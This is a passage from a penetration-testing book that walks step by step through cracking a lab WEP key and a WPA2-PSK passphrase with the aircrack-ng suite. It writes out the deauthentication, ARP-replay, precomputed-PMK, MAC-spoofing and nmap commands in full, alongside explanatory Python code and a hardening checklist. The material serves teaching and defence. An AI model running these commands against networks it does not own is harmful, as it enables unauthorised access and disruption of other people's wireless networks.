KoreK and others. A full cryptographic evaluation of WEP is outside the scope of this book 
because it requires a thorough grounding in the mathematics. In this section we look instead at 
how to crack WEP on Kali using readily available tools: airmon-ng, aireplay-ng, airodump-ng, 
aircrack-ng and other tools from the aircrack-ng suite. 


WEP's core flaw is its use of RC4 with a short, 24-bit initialization vector (IV) that is sent in the 
clear and prepended to the shared key. Only 2^24 (about 16.7 million) IVs exist, so on a busy 
network they must repeat; by the birthday bound there is already a 50% chance that some IV has 
been reused after roughly 5,000 frames. Two frames encrypted under the same IV and key share 
the same RC4 keystream, so XORing their ciphertexts cancels the keystream and leaves the XOR 
of the two plaintexts. To exploit this, we generate a large amount of traffic to increase the number 
of reused and statistically weak IVs, then compare ciphertexts encrypted with the same IV and 
key, as shown in Figure 4.1: 

Figure 4.1: WEP encryption 
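The following added example (written for this edition; it is not code from the aircrack-ng suite) works the IV-reuse flaw through in Python. It implements RC4, encrypts two frames under the same IV with the lab key 0123456789, recovers the keystream from the frame whose plaintext is predictable (the LLC/SNAP and ARP header every ARP frame starts with), uses that keystream to decrypt the second frame, and computes the birthday probability that an IV repeats after a given number of frames. The IV, the frame contents and the omission of the CRC-32 ICV trailer are simplifications made for the example:

```python
"""WEP keystream reuse, worked through with RC4.

Added example; not code from the aircrack-ng suite. WEP encrypts each frame
with RC4 keyed by IV || WEP key, where the 24-bit IV is sent in the clear.
Two frames that share an IV (and therefore a key) share a keystream, so
XORing their ciphertexts cancels the keystream and leaves plaintext1 XOR
plaintext2; one known plaintext then yields the keystream and decrypts the
other frame. Key matches the lab AP (0123456789); IV and frame contents are
constructed, and the CRC-32 ICV trailer is omitted for brevity.
"""
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same XOR."""
    S = list(range(256))
    j = 0
    for i in range(256):                               # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                                  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte cleartext IV, then RC4(IV || key) applied to the payload."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV is 24 bits; WEP keys are 40 or 104 bits")
    return iv + rc4(iv + key, plaintext)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR known plaintext."""
    return xor(frame[3:], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    return xor(frame[3:], keystream)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames` random IVs."""
    n = 2 ** iv_bits
    log_p_no_collision = sum(math.log1p(-k / n) for k in range(frames))
    return 1.0 - math.exp(log_p_no_collision)


# --- constructed lab traffic ---
WEP_KEY = bytes.fromhex("0123456789")            # 40-bit key; "64-bit WEP" counts the 24-bit IV
IV = bytes.fromhex("000001")                      # the AP reuses this IV for two frames
# Every ARP frame starts with this LLC/SNAP header and fixed ARP prefix: predictable plaintext
FRAME1_PLAINTEXT = bytes.fromhex("aaaa030000000806" "0001080006040001")
FRAME2_PLAINTEXT = b"GET /cgi-bin/adm"            # 16 bytes of a data frame we want to read


def demo_iv_reuse() -> bytes:
    """Sniff two frames under one IV, recover the keystream from the ARP frame, read the other."""
    frame1 = wep_encrypt(IV, WEP_KEY, FRAME1_PLAINTEXT)
    frame2 = wep_encrypt(IV, WEP_KEY, FRAME2_PLAINTEXT)
    assert frame1[:3] == frame2[:3]                   # the reused IV is visible in the clear
    keystream = recover_keystream(frame1, FRAME1_PLAINTEXT)
    return decrypt_with_keystream(frame2, keystream)


if __name__ == "__main__":
    print("recovered:", demo_iv_reuse())
    for n in (1000, 4823, 10000):
        print(f"{n:5d} frames -> P(IV reuse) = {iv_collision_probability(n):.3f}")
```

The ARP replay attack used later in this section is the practical version of the same idea: every replayed ARP frame forces the access point to emit another frame with a new IV, driving the IV space toward exhaustion far faster than normal traffic would.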


Cracking WEP encryption 


We will go through step-by-step instructions on how to crack WEP encryption in this part. 


1. Connect to our access point, Wireless Lab, and navigate to the wireless security section of 
its settings, as shown in Figure 4.2. On my access point this means setting Security Options 
to WEP. We also need to set the WEP key length: here WEP is configured for 64-bit keys, 
the default key is WEP Key 1 and the key value is 0123456789 in hex (a 40-bit key; the 
remaining 24 bits of a "64-bit" WEP key are the per-frame IV). You can change it to 
whatever you like. 

Figure 4.2: Netgear router setting 


Once the changes have been made, the access point should now be able to use WEP as an 
encryption method. Let us get the attacker machine up and running. 


2. Open a Terminal window, type the following command and hit Enter: 
airmon-ng start wlan0 


This puts the wlan0 interface into monitor mode. Monitor mode lets your computer listen to 
every wireless frame within range of the card, not only those addressed to it, and it is also 
what allows us to inject frames into a wireless network. airmon-ng first lists processes that 
could interfere (NetworkManager and wpa_supplicant) and then reports the interface it has 
set up; on recent Kali releases the monitor interface is renamed to wlan0mon, so use 
whichever name airmon-ng prints in the commands that follow. The result is shown in 
Figure 4.3: 


Figure 4.3: airmon-ng command (PHY phy0, interface wlan0, driver mt7601u, chipset Ralink 
Technology, Corp. MT7601U) 


3. Type the following command and press Enter: 
airodump-ng wlan0 


This uses the monitor-mode interface to list every access point and client in range, showing 
each network's BSSID, channel and encryption type, so that we can pick out our target. 
The result is shown in Figure 4.4: 


Figure 4.4: airodump-ng command_1 


4. Type the following command and press Enter: 
airodump-ng -c 1 -w capture --bssid DC:EF:09:59:B1:1F wlan0 


The components of the command are as follows: 


• -c 1: the channel the access point operates on; airodump-ng locks the card to it 
• -w capture: the prefix of the capture files to write (capture-01.cap and so on) 
• --bssid: the MAC address of the target access point, so that only its traffic is recorded 


Figure 4.5 is the output of the previous command: 


Figure 4.5: airodump-ng command_2 


Let us connect our wireless client to the access point using the WEP key 0123456789. 
When the client connects successfully, airodump-ng lists it in the station section at the 
bottom of the screen. 


To exploit the flaws in the protocol we need a large number of data packets encrypted with 
the same key, just as we would see on a busy network. So we need to make the network 
produce more data packets, and we use the aireplay-ng utility for that. 
5. Type the following command and press Enter, as shown in Figure 4.6: 
aireplay-ng -1 1000 -q 10 -e 'Wireless Lab' -a DC:EF:09:59:B1:1F -h 
00:11:22:33:44:55 wlan0 --ignore-negative-one 


The components of the command are: 


• -1 1000: fake authentication with the access point, re-authenticating every 1000 seconds 
(0 would authenticate once) 
• -q 10: send a keep-alive every 10 seconds so the association is not dropped 
• -e: the target access point's SSID 
• -a: the access point's MAC address 
• -h: the source MAC address to use (00:11:22:33:44:55 is our spoofed client MAC; the 
card's own MAC must be set to the same value or the access point's replies are never 
acknowledged, which is covered later in this chapter under spoofing your MAC address) 
• --ignore-negative-one: works around the "fixed channel -1" error that some drivers 
report 


Figure 4.6: aireplay-ng command_1 


6. We will use aireplay-ng to capture ARP packets on the wireless network and inject them 
back to elicit fresh ARP replies. As shown in Figure 4.7, aireplay-ng runs in a separate 
window. Replaying these packets a few thousand times generates a lot of data traffic, each 
frame carrying a new IV. Even though aireplay-ng does not have the WEP key, it can 
recognize ARP packets by their size: ARP has a fixed-length header, so its encrypted frames 
have a predictable length even though their contents are unreadable. The options are: -3 
selects the ARP request replay attack, -b is our network's BSSID and -h is the MAC address 
of the client we are spoofing. The access point only accepts replayed frames from an 
authenticated and associated client MAC, which is why the fake authentication in the 
previous step, using the same -h address, is needed, as shown in Figure 4.7: 
aireplay-ng -3 -b DC:EF:09:59:B1:1F -h 00:11:22:33:44:55 wlan0 


Figure 4.7: aireplay-ng command_2 


7. Airodump-ng will also begin registering many data packets at this moment. The capture 
files contain all these intercepted packets. 


8. Let us start with the actual cracking! In a new window, we run aircrack-ng with the 
capture-01.cap option. This will launch the aircrack-ng program, which will begin 
cracking the WEP key using the data packets in the file. Airodump-ng should gather WEP 
packets, aireplay-ng should perform the replay attack, and aircrack-ng should attempt to 
crack the WEP key based on the collected packets all at the same time. All of them are 
open in distinct windows in this experiment. Press Enter after typing the following 


command, as shown in Figure 4.8: 
aircrack-ng capture-01.cap 


Figure 4.8: aircrack-ng command 


The number of data packets (unique IVs) needed to crack the key is nondeterministic; with the 
PTW attack that aircrack-ng uses by default it is typically around 20,000 for a 64-bit key and 
40,000 to 85,000 for a 128-bit key, which on a busy network (or with aireplay-ng replaying ARP) 
takes no more than 5-10 minutes to collect. If the capture file does not yet hold enough packets, 
aircrack-ng pauses, waits for more to be collected and then restarts the attempt. Once enough IVs 
have been gathered and analyzed, aircrack-ng should recover the key. 


Congratulations on successfully cracking a WEP-encrypted network if you were able to recover 
the key! Do not be concerned if you did not succeed. Each wireless access point and network is 
different, and the outcome also depends on the signal strength between you and the access point 
and on the key length in use. 


It is crucial to understand that WEP is completely broken, and aircrack-ng can crack any WEP key 
no matter how complex it is. The only requirement is that aircrack-ng gets enough data packets 
encrypted with that key. 


Note: We can also use the Shared Key Authentication bypass approach we learned in the 
previous chapter to fake an authentication to the access point. This is useful if the legitimate 
client leaves the network: it lets us spoof authentication and association while we keep 
injecting our replayed packets. 


WPA and WPA2 encryption 


WPA primarily uses the TKIP encryption algorithm. TKIP was designed as an upgrade to WEP 
that did not require entirely new hardware. WPA2, on the other hand, uses AES-CCMP, which is 
far stronger and more robust than TKIP. 

Both WPA and WPA2 support EAP-based authentication against a RADIUS server (Enterprise) 
or a Pre-Shared Key (PSK) scheme (Personal). 

WPA/WPA2-PSK is vulnerable to an offline dictionary attack. The attack needs a capture of the 
four-way handshake between a client and the access point and a wordlist of common 
passphrases; we can then try to recover the WPA/WPA2 passphrase with a tool such as 
aircrack-ng. 


The four-way handshake is depicted in Figure 4.9: 
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Figure 4.9: WPA/WPA2 authentication diagram 


The Pairwise Transient Key (PTK) is derived from the Pairwise Master Key (PMK) and four other 
values exchanged in the clear: the Authenticator Nonce (ANonce), the Supplicant Nonce 
(SNonce), the authenticator MAC address (the access point) and the supplicant MAC address (the 
Wi-Fi client). The traffic between the access point and the client is then protected with keys taken 
from the PTK. 


All of these values can be obtained by an attacker sniffing the air and listening to the whole 
exchange. The one thing the attacker lacks is the PMK, which on a Personal network is the PSK 
itself. So how is the PSK made? It is derived from the WPA-PSK passphrase entered by the user 
and the network's SSID: the Password-Based Key Derivation Function (PBKDF2, using 
HMAC-SHA1 with 4,096 iterations and the SSID as salt) turns the combination into the 256-bit 
shared key. 


In a standard WPA/WPA2-PSK dictionary attack, the attacker feeds a large dictionary of 
candidate passphrases to the attack tool. For each candidate, the tool derives the 256-bit PSK, 
combines it with the parameters above to generate the PTK, and uses the PTK to recompute the 
Message Integrity Check (MIC) of one of the handshake packets. If the recomputed MIC matches 
the captured one, the candidate was the right passphrase; if not, it was wrong. 


If the real network passphrase is in the dictionary, it will eventually be found. That is how PSK 
cracking works for WPA/WPA2! The steps are illustrated in Figure 4.10: 

Figure 4.10: WPA/WPA2 dictionary attack 

We will see how to break into a WPA-PSK wireless network; exactly the same steps break a 
WPA2-PSK network using CCMP (AES). 


Cracking WPA-PSK and WPA2-PSK passphrase 


To get started, simply follow the provided instructions. 


1. Let us first connect to our Wireless Lab access point and configure it to use WPA2-PSK 
[AES]. We set the WPA2-PSK [AES] passphrase to abcdefgh to make it vulnerable to a 
dictionary attack, as shown in Figure 4.11: 

Figure 4.11: Netgear router setting 


2. Type the following command into the Terminal: 
airmon-ng start wlan0 


This starts the wlan0 interface in monitor mode, as shown in Figure 4.12: 

Figure 4.12: airmon-ng command 


3. Type the following command and press Enter: 
airodump-ng wlan0 


This lists the access points and clients in range so that we can find our target's BSSID and 
channel, as shown in Figure 4.13: 


Figure 4.13: airodump-ng command_1 


4. Type the following command and press Enter, as shown in Figure 4.14: 
airodump-ng -c 11 -w wpacracking --bssid DC:EF:09:59:B1:1F wlan0 


Figure 4.14: airodump-ng command_2 


5. We can either wait for a new client to connect to the access point so that we capture the 
four-way WPA2 handshake, or force the clients already connected to re-join by sending a 
broadcast deauthentication frame. To speed things up we do the latter. The unknown 
channel error can occur here too, so add --ignore-negative-one again. This may take several 
attempts, as shown in Figure 4.15: 
aireplay-ng --deauth 1 -a DC:EF:09:59:B1:1F wlan0 --ignore-negative-one 


Figure 4.15: aireplay-ng command (waiting for a beacon from BSSID DC:EF:09:59:B1:1F on 
channel 11, then sending the deauthentication to broadcast) 


6. When airodump-ng captures a handshake, it displays WPA handshake: followed by the 
access point's BSSID in the top-right corner of the screen. If you used --ignore-negative-one, 
the tool may show a fixed channel message in that position instead, so keep an eye out for 
the WPA handshake indicator, which may only flash up briefly. 


7. We can now stop airodump-ng. Let us look at the four-way handshake in Wireshark by 
opening the .cap file. Figure 4.16 shows how your Wireshark window should look; in the 
screenshot the first packet of the four-way handshake is selected in the trace. The handshake 
messages are EAPOL-Key frames. As Figure 4.16 shows, they contain nothing that reveals 
the key directly, but they do contain the nonces and the MIC that let us check whether a 
guessed key is valid. 

Figure 4.16: Wireshark 


8. Now we start the real key cracking! We need a dictionary of common passphrases. Kali 
ships several wordlists (under /usr/share/wordlists, with more in Metasploit's data 
directory), as shown in Figure 4.17. It is vital to remember that in WPA2 cracking you are 
only as good as your dictionary. The lists that come with Kali may not be enough: people's 
passwords are shaped by their home country, the common names and phrases of that region, 
their security awareness and many other factors. When doing a penetration test, it is a good 
idea to add country- and region-specific wordlists, as shown in Figure 4.17: 


Figure 4.17: Metasploit 


9. As shown in Figure 4.18, we run aircrack-ng with the .cap file as input and -w pointing at 
the dictionary file. In the terminal I used nmap.lst: 

aircrack-ng wpacracking-05.cap -w /usr/share/wordlists/nmap.lst 

aircrack-ng tests each candidate passphrase from the dictionary against the captured 
handshake. If the passphrase is in the dictionary it will eventually be found, and your screen 
will look like Figure 4.18, which also prints the EAPOL HMAC computed for the matching 
passphrase: 


Figure 4.18: aircrack-ng command 


10. Keep in mind that because this is a dictionary attack, the passphrase must be present in the 
dictionary file you give to aircrack-ng. If it is not, the attack will fail! 


Because WPA2-PSK is vulnerable to a dictionary attack, we feed aircrack-ng the capture 
file containing the WPA2 four-way handshake together with a wordlist of common 
passphrases. aircrack-ng recovers the WPA2-PSK passphrase here because abcdefgh is in 
the wordlist. It is worth repeating that in WPA2 dictionary cracking you are only as good as 
your dictionary, so it is critical to start by compiling a large, well-targeted wordlist. Kali 
comes with its own lists, but they may be insufficient and need to be extended. 


Speeding up WPA and WPA2 Cracking 


As we saw in the last section, if we have the right passphrase in our dictionary, breaking WPA2-Personal is a piece of cake. So, why do we not simply compile a massive dictionary of millions of commonly used passwords and phrases? This would be extremely beneficial to us, and we would almost always succeed in cracking the passphrase. Everything sounds fantastic, but there is one thing missing: the time spent. Deriving the Pre-Shared Key from the PSK passphrase and the SSID through PBKDF2 is one of the more CPU- and time-consuming calculations. This function hashes the combination of both 4,096 times before returning the 256-bit Pre-Shared Key. The next stage in the cracking process is to use this key, along with parameters from the four-way handshake, to verify the handshake against the MIC. This is a computationally cheap phase. However, the handshake parameters change with every connection; therefore, this phase cannot be pre-calculated. As a result, to speed up the cracking process, we must calculate the Pre-Shared Key from the passphrase as quickly as feasible.


Pre-calculating the Pre-Shared Key, also known as the Pairwise Master Key (PMK) in 802.11 standard jargon, can help speed things up. It is worth noting that because the SSID is also used to calculate the PMK, we will get a different PMK if we use the same passphrase with a different SSID. As a result, the PMK depends on both the passphrase and the SSID.
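The derivation just described, written out as an added example (my code, not the book's and not from any of the tools it names). It is what genpmk, cowpatty, airolib-ng and pyrit all precompute: PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4,096 iterations, 32 bytes out. It also shows the defensive consequence: a table built for one SSID is worthless against another, so a unique SSID is what keeps precomputed PMK tables from transferring. The lab values (abcdefgh, "Wireless Lab") are the book's; the IEEE known-answer vector is from the 802.11i annex.

```python
import hashlib
import hmac

# Added example, not code from the book: the WPA/WPA2-Personal PMK derivation
# that genpmk, cowpatty, airolib-ng and pyrit precompute. Per IEEE 802.11i:
#   PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, iterations=4096, dkLen=32 bytes)
PBKDF2_ITERATIONS = 4096   # the fixed per-candidate cost the text describes
PMK_LEN = 32               # 256-bit Pairwise Master Key


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit PMK for one passphrase/SSID pair (library PBKDF2)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def derive_pmk_manual(passphrase: str, ssid: str) -> bytes:
    """Same derivation spelled out so the 4,096 chained HMAC rounds are visible.

    A 32-byte output from a 20-byte SHA-1 needs two PBKDF2 blocks (i = 1, 2).
    Each block is U1 xor U2 xor ... xor U4096 with U1 = HMAC(P, S || INT(i))
    and Uj = HMAC(P, Uj-1); the chain is sequential, which is where the time goes."""
    key = passphrase.encode("ascii")
    salt = ssid.encode("utf-8")
    out = b""
    for block_index in (1, 2):
        u = hmac.new(key, salt + block_index.to_bytes(4, "big"), hashlib.sha1).digest()
        t = u
        for _ in range(PBKDF2_ITERATIONS - 1):
            u = hmac.new(key, u, hashlib.sha1).digest()
            t = bytes(a ^ b for a, b in zip(t, u))
        out += t
    return out[:PMK_LEN]


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs on two SSIDs,
    i.e. a table precomputed for one SSID is useless against the other."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


# Known-answer check from IEEE 802.11i Annex H (passphrase "password", SSID "IEEE").
IEEE_TEST_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

if __name__ == "__main__":
    assert derive_pmk("password", "IEEE") == IEEE_TEST_PMK
    assert derive_pmk_manual("password", "IEEE") == IEEE_TEST_PMK
    # The book's lab values: same passphrase, two SSIDs, two unrelated PMKs.
    print(derive_pmk("abcdefgh", "Wireless Lab").hex())
    print(pmk_depends_on_ssid("abcdefgh", "Wireless Lab", "Wireless Lab 2"))
```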


Speeding up the cracking process 


We can go ahead and do the following: 


1. Using the genpmk tool, we can compute the PMK for a given SSID and wordlist ahead of time:
genpmk -f <chosen wordlist> -d PMK-Wireless-Lab -s "Wireless Lab"
This generates the PMK-Wireless-Lab file, which contains the PMKs, as can be seen in Figure 4.19:


Figure 4.19: genpmk command


2. We will now build a WPA-PSK network with the passphrase abcdefgh (found in the dictionary) and capture a WPA handshake for it. As illustrated in Figure 4.20, we now use Cowpatty to crack the WPA passphrase:
cowpatty -d PMK-Wireless-Lab -s "Wireless Lab" -r wpacracking-05.cap


Figure 4.20: Cowpatty command


Cowpatty uses the pre-calculated PMKs to crack the key in approximately 6 seconds.


3. With the same dictionary file, we now run aircrack-ng, and the cracking operation takes 
almost 22 minutes. This demonstrates how much we gain because of the pre-calculation. 


4. To use these PMKs with aircrack-ng, we need a tool named airolib-ng, as follows:
airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab
Here, PMK-Aircrack is the aircrack-ng-compatible database to be built, and PMK-Wireless-Lab is the previously created genpmk-compliant PMK database. Refer to Figure 4.21:


Figure 4.21: airolib-ng command 


5. We now feed this database to aircrack-ng, which significantly speeds up the cracking process. The following command is used, as shown in Figure 4.22:
aircrack-ng -r PMK-Aircrack wpacracking-05.cap


Figure 4.22: aircrack-ng command


6. Additional Kali tools, like Pyrit, can make use of multi-processor platforms to speed up cracking. Intel Core i7 CPUs, for example, can do faster cracking operations. The -r option specifies the pcap filename, whereas -i specifies the genpmk-compliant PMK file. Pyrit takes roughly 3 seconds to break the key on the same system as the preceding tools, using the same PMK file prepared using genpmk.


In addition to the aforementioned factors, the length of the WPA/WPA2 PSK plays a major role in the cracking process. Cracking longer passphrases takes longer.


Spoofing your MAC address


You might be aware that MAC address filtering is not entirely secure. It is much less effective than WEP encryption, in my opinion, because it is trivial to forge. This is not to say that MAC address filtering is not useful. It does filter out many attackers who are only interested in the weakest-link networks. Whatever you do, do not rely just on MAC filtering! WEP encryption is preferable to no encryption. Refer to Figure 4.23 for an illustration of MAC spoofing:
Figure 4.23: MAC spoofing


This does not necessitate a high level of competence. All you must do is listen in on wireless network traffic and change your MAC address to that of someone who is already connected. Changing your MAC address is as simple as 1, 2, 3 with automation scripts or applications. Using an application called macchanger, let us see how we can spoof our MAC address.


1. Open the Terminal. 


2. Press Enter after typing the following command:
ifconfig wlan0 down


This command disables or turns off the wireless interface, as shown in Figure 4.24:


Figure 4.24: ifconfig wlan0 down command


3. To reactivate wlan0, use the following command and press Enter, as shown in Figure 4.25:
ifconfig wlan0 up


Figure 4.25: ifconfig wlan0 up command


4. Press Enter after typing the following command:
macchanger --random wlan0


This command generates a random fake MAC address for the wireless interface, as shown in Figure 4.26:


Current MAC: fe:eb:d4:4f:9d:51 (unknown)
Permanent MAC: 1c:bf:ce:89:8c:e2 (unknown)
New MAC: 42:0c:e0:20:d3:71 (unknown)


Figure 4.26: macchanger command_1


5. Press Enter after typing the following command:
macchanger --mac=00:11:22:33:44:55 wlan0


As displayed, this command lets you set a chosen fake MAC address on the wireless interface, as shown in Figure 4.27:


Current MAC: 42:0c:e0:20:d3:71 (unknown)
Permanent MAC: 1c:bf:ce:89:8c:e2 (unknown)
New MAC: 00:11:22:33:44:55 (CIMSYS Inc)


Figure 4.27: macchanger command_2


It is as simple as that! Knowing this also shows why paid hotspot networks, where you pay for a period of access, cannot rely on MAC addresses alone. These networks are found in coffee shops, restaurants, airports, and hotels. When a user pays, their MAC address is added to the list of MAC addresses permitted to access the internet.


Protect yourself from wireless attacks 


We must always be aware of how to defend ourselves against such dangers and attacks. The following are ways to defend yourself against these attacks:


• Encryption that is more robust reduces the likelihood of an attack.
• MAC filtering can also help to lessen the chances of an attack.
• If your devices are not compatible with WPA/WPA2, you can use WEP instead; however, it is not suggested because it is insecure.
• To restrict access to a business network, create a distinct VLAN.
• WPS should be disabled or turned off.
• Make a strong, complicated passphrase.
• Passwords should be changed every three to four months.
• Use the manufacturer's default passwords only as a last resort.
• Instead of PSK, use EAP.
• Change the SSID name that comes up by default.
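The checklist above applied to an access point configuration, as an added example (my code, not the book's). It parses a hostapd.conf and reports every item the file violates; both configurations are constructed samples, the option names (wpa, wpa_key_mgmt, rsn_pairwise, wpa_passphrase, wps_state, wep_key0, wep_default_key) are real hostapd keys, and MIN_PASSPHRASE_LEN and DEFAULT_SSID_HINTS are thresholds assumed for this example rather than anything the book states.

```python
# Added example, not code from the book: review a hostapd.conf against the
# wireless-hardening checklist. WEAK_CONF and HARDENED_CONF are constructed;
# MIN_PASSPHRASE_LEN and DEFAULT_SSID_HINTS are assumptions made for this example.
MIN_PASSPHRASE_LEN = 20
DEFAULT_SSID_HINTS = ("default", "linksys", "netgear", "dlink", "tp-link")

WEAK_CONF = """\
interface=wlan0
ssid=dlink
hw_mode=g
channel=6
# static WEP key and no WPA block at all
wep_default_key=0
wep_key0=abcde
wps_state=2
"""

HARDENED_CONF = """\
interface=wlan0
ssid=Lab-AP-3F-West
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=correct-horse-capacitor-quarterly-rotate-91
wps_state=0
"""


def parse_hostapd_conf(text: str) -> dict:
    """hostapd.conf is key=value per line; '#' starts a comment."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def review_hostapd_conf(conf: dict) -> list:
    """Return one finding per checklist item the configuration violates."""
    findings = []
    if any(k.startswith("wep_key") or k == "wep_default_key" for k in conf):
        findings.append("WEP keys configured: WEP is broken, move to WPA2/WPA3")
    wpa = int(conf.get("wpa", "0"))          # bitmask: 1 = WPA, 2 = WPA2/RSN
    if wpa == 0:
        findings.append("no wpa= line: network is open or WEP-only, set wpa=2")
    elif wpa & 1:
        findings.append("wpa=%d enables legacy WPA (TKIP); use wpa=2" % wpa)
    if "TKIP" in conf.get("rsn_pairwise", "") or "TKIP" in conf.get("wpa_pairwise", ""):
        findings.append("TKIP allowed as pairwise cipher; use CCMP only")
    if conf.get("wps_state", "0") != "0":    # hostapd default 0 = WPS disabled
        findings.append("WPS is enabled (wps_state=%s); set wps_state=0" % conf["wps_state"])
    passphrase = conf.get("wpa_passphrase")
    if passphrase is not None and len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append("wpa_passphrase shorter than %d characters" % MIN_PASSPHRASE_LEN)
    ssid = conf.get("ssid", "").lower()
    if any(hint in ssid for hint in DEFAULT_SSID_HINTS):
        findings.append("SSID looks like a vendor default: %r" % conf.get("ssid"))
    # Not checked here: wpa_key_mgmt=WPA-EAP with a RADIUS server (the "use EAP
    # instead of PSK" item) needs ieee8021x settings beyond this fragment.
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, review_hostapd_conf(parse_hostapd_conf(text)) or ["no findings"])
```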


Conclusion 


We prepared an offensive plan in this chapter. Following that, we outlined many attack methods. Then we went through the details of WEP, WPA, and WPA2 encryption. Finally, we outlined a few strategies for reducing the likelihood of a wireless attack.


In the upcoming chapter, we will look at how to identify hosts on a wireless network, figure out 
how big it is, and spot susceptible devices and systems on it. Let us start! 


Questions


Explain WEP encryption.

How do you crack WEP encryption?

Explain WPA/WPA2 encryption.

How do you crack WPA/WPA2 encryption?

How do you protect yourself from wireless attacks?
CHAPTER 5


Gain Access to Wireless Network 


Introduction 


We have arrived at the fifth chapter! In this chapter, we will cover a variety of topics related to 
having network access as a wireless penetration tester. We will conduct network evaluations to 
identify hosts, calculate network size, and identify vulnerable hosts. When doing a penetration 
test, it is a good idea to know how many hosts are on the network because you do not want to 
leave anything out. Let us start by talking about why this is so crucial. 


Structure 


In this chapter, we will discuss the following topics: 


• Identifying hosts
• Determining network size
• Detecting vulnerable hosts
• Preventing against threats


Objectives 


In this chapter, you will understand why it is important to find the number of live hosts when conducting a penetration test on a network. Next, you will identify hosts on the network with Kali Linux. Then, you will determine the network size and learn why it is important for a penetration tester to understand it. In the end, you will be able to detect vulnerabilities in Windows 7 using the Nessus vulnerability scanner, and you will also be able to apply several preventive measures that could help reduce risk.


We need to know if there is a client on the network that is running Windows 7. The user should understand that they are in danger because they are running an outdated version of Windows. In a matter of minutes, Windows 7 can be hacked! Microsoft stopped supporting Windows 7 in January 2020. Because Windows 7 is no longer maintained, attackers will flock to this version of the operating system in search of flaws. The reason for this is that Microsoft no longer offers security patches, which means that if an attacker discovers a hole in the system, it will remain susceptible indefinitely.


We will use a variety of networking tools to figure out how many hosts are on the network, what 
operating system they are running, how big the network is, and which ones are vulnerable. 
Knowing what parts of the network are susceptible and then applying security patches or 
upgrades will help to improve security. Keep in mind that not only the systems and equipment in 
your business are vulnerable but also the people! 


This is certainly one of the most serious security threats one encounters. Your employees should go through a security awareness program to learn about the good and the bad, as well as the dos and don'ts. You may also have employees who share customer information outside of the workplace for financial advantage. Keep a watch out for any unusual conduct that could jeopardize the company's operations.


Identifying hosts 


This section covers the various tools available for identifying hosts on a network. These 
programs will provide a user’s IP address, MAC address, open and closed ports, services, 
operating system, and other details. The following sections contain a list of Kali Linux tools that 
can be used to identify hosts on a network. 


Network mapping tools 


The command-line interface of Nmap will be the center of our attention. Here are some 
alternative network mapping tools to consider: 


• 0trace
• Angry IP Scanner
• hping2 and hping3
• lanmap and lanmap2
• TCP traceroute


You will learn how to use Nmap to identify hosts on a network in this tutorial. When it comes to network discovery or determining whether a network service, such as Telnet, SSH, or FTP, is running, these tools are by far my favorites. Let us get started!

1. Open the Terminal 


2. Press Enter after typing the following command:
ifconfig


In this case, our private IP address is 192.168.1.128, as shown in Figure 5.1. Because our 
gateway is 192.168.1.1, we will see how to scan the entire subnet next. 


Figure 5.1: ifconfig command


3. Press Enter after typing the following command:
nmap 192.168.X.0/24


This command scans all hosts in the 192.168.1.1 through 192.168.1.254 range. You will notice some intriguing information in your output, such as open and closed ports, services, and the operating system they are using.


We can detect multiple systems and devices on the local network, as shown in Figure 5.2:


nmap 192.168.1.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-13 15:14 EST
Nmap scan report for 192.168.1.1
Host is up (0.00019s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
808/tcp open ccproxy
902/tcp open iss
912/tcp open apex
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.1.2
Host is up (0.00033s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:E3:E5:DE (VMware)

Nmap scan report for 192.168.1.129
Host is up (0.00025s latency).
All 1000 scanned ports on 192.168.1.129 are filtered
MAC Address: 00:0C:29:C9:EF:96 (VMware)

Nmap scan report for 192.168.1.254


Figure 5.2: nmap command


4. If you have a firewall installed on your network, run the following command:
nmap -PN 192.168.X.0/24


All hosts will be treated as online, and host discovery will be skipped. It is used to get past standard firewall filters and see whether the firewall is up and running, as shown in Figure 5.3:


Figure 5.3: nmap command_2
